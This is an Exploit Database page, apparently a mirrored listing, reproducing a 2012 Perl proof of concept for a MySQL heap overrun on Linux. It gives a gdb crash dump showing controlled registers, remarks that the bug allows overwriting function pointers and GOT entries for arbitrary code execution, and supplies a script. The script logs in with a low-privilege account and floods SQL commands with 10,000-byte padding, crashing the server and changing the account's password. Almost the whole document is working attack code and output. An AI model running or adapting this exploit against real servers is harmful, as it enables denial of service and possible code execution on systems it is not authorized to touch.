MySQL (Linux) – Heap Overrun (PoC)

• Exploit Database
• 9 阅读

• 作者： kingcope
  日期： 2012-12-02
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/23076/

• # MySQL Heap Overrun
  # tested for the latest version of mysql server on a SuSE Linux system
  #
  # As seen below $edx and $edi are fully controlled,
  # the current instruction is
  # => 0x83a6b24 <free_root+180>: mov(%edx),%edi
  # this means we landed in a place where 4 bytes can be controlled by 4 bytes
  # with this function pointers and GOT entries can be rewritten to execute arbritrary code
  #
  # a user account (with less privileges) is needed
  # beware: this script will change the users password to an undefined value
  #
  
  =for comment
  Program received signal SIGSEGV, Segmentation fault.
  [Switching to Thread 0xa86b3b70 (LWP 9219)]
  free_root (root=0x8e7c714, MyFlags=1) at /root/mysql-5.5.19/mysys/my_alloc.c:369
  369 old=next; next= next->next;
  (gdb) bt
  #0free_root (root=0x8e7c714, MyFlags=1) at /root/mysql-5.5.19/mysys/my_alloc.c:369
  #10x082a2e9f in cleanup (thd=0x8e7b9b8, all=true) at /root/mysql-5.5.19/sql/sql_class.h:1709
  #2ha_rollback_trans (thd=0x8e7b9b8, all=true) at /root/mysql-5.5.19/sql/handler.cc:1401
  #30x0824a747 in trans_rollback (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/transaction.cc:260
  #40x081897a7 in THD::cleanup (this=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_class.cc:1271
  #50x08140fc3 in thd_cleanup (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/mysqld.cc:2026
  #6unlink_thd (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/mysqld.cc:2075
  #70x08141088 in one_thread_per_connection_end (thd=0x8e7b9b8, put_in_cache=true) at /root/mysql-5.5.19/sql/mysqld.cc:2188
  #80x0823eab3 in do_handle_one_connection (thd_arg=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_connect.cc:796
  #90x0823ebbc in handle_one_connection (arg=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_connect.cc:708
  #10 0xb7744b05 in start_thread () from /lib/libpthread.so.0
  #11 0xb750fd5e in clone () from /lib/libc.so.6
  (gdb) i r
  eax0x8ec63b8149709752
  ecx0xa86b326c -1469369748
  edx0x5a5a5a5a 1515870810
  ebx0x880eff4142667764
  esp0xa86b31b0 0xa86b31b0
  ebp0xa86b31d8 0xa86b31d8
  esi0x8e7c714149407508
  edi0x5a5a5a5a 1515870810
  eip0x83a6b240x83a6b24 <free_root+180>
  eflags 0x210293 [ CF AF SF IF RF ID ]
  cs 0x73 115
  ss 0x7b 123
  ds 0x7b 123
  es 0x7b 123
  fs 0x00
  gs 0x33 51
  (gdb) x/10i $eip
  => 0x83a6b24 <free_root+180>: mov(%edx),%edi
   0x83a6b26 <free_root+182>: je 0x83a6b33 <free_root+195>
   0x83a6b28 <free_root+184>: mov%edx,(%esp)
   0x83a6b2b <free_root+187>: call 0x83acb70 <my_free>
   0x83a6b30 <free_root+192>: mov0x8(%esi),%eax
   0x83a6b33 <free_root+195>: test %edi,%edi
   0x83a6b35 <free_root+197>: jne0x83a6b20 <free_root+176>
   0x83a6b37 <free_root+199>: test %eax,%eax
   0x83a6b39 <free_root+201>: movl $0x0,(%esi)
   0x83a6b3f <free_root+207>: movl $0x0,0x4(%esi)
  (gdb)
  =cut
  
  use Net::MySQL;
  use Encode;
  $|=1;
  
  my $mysql = Net::MySQL->new(
  hostname => '192.168.2.3',
  database => "test",
  user => "user",
  password => "test",
  debug => 0,
  port => 3306,
  );
  
  @commands = ('USE d', 'SHOW TABLES FROM d', "DESCRIBE t", "SHOW FIELDS FROM t", "SHOW COLUMNS FROM t", "SHOW INDEX FROM t",
  			 "CREATE TABLE table_name (c CHAR(1))", "DROP TABLE t", "ALTER TABLE t DROP c",
  			 "DELETE FROM t WHERE 1=1", "UPDATE t SET a=a","SET PASSWORD=PASSWORD('p')");
  
  foreach my $command (@commands) {
  	for ($k=0;$k<length($command);$k++) {
  		$c = substr($command, 0, $k) . "Z" x 10000 . substr($command, $k+1);
  		$c2 = substr($command, 0, $k) . "AAAA..AA" . substr($command, $k+1);
  		
  		print "$c2";
  		$mysql->query($c);
  	}
  }
  $mysql->close;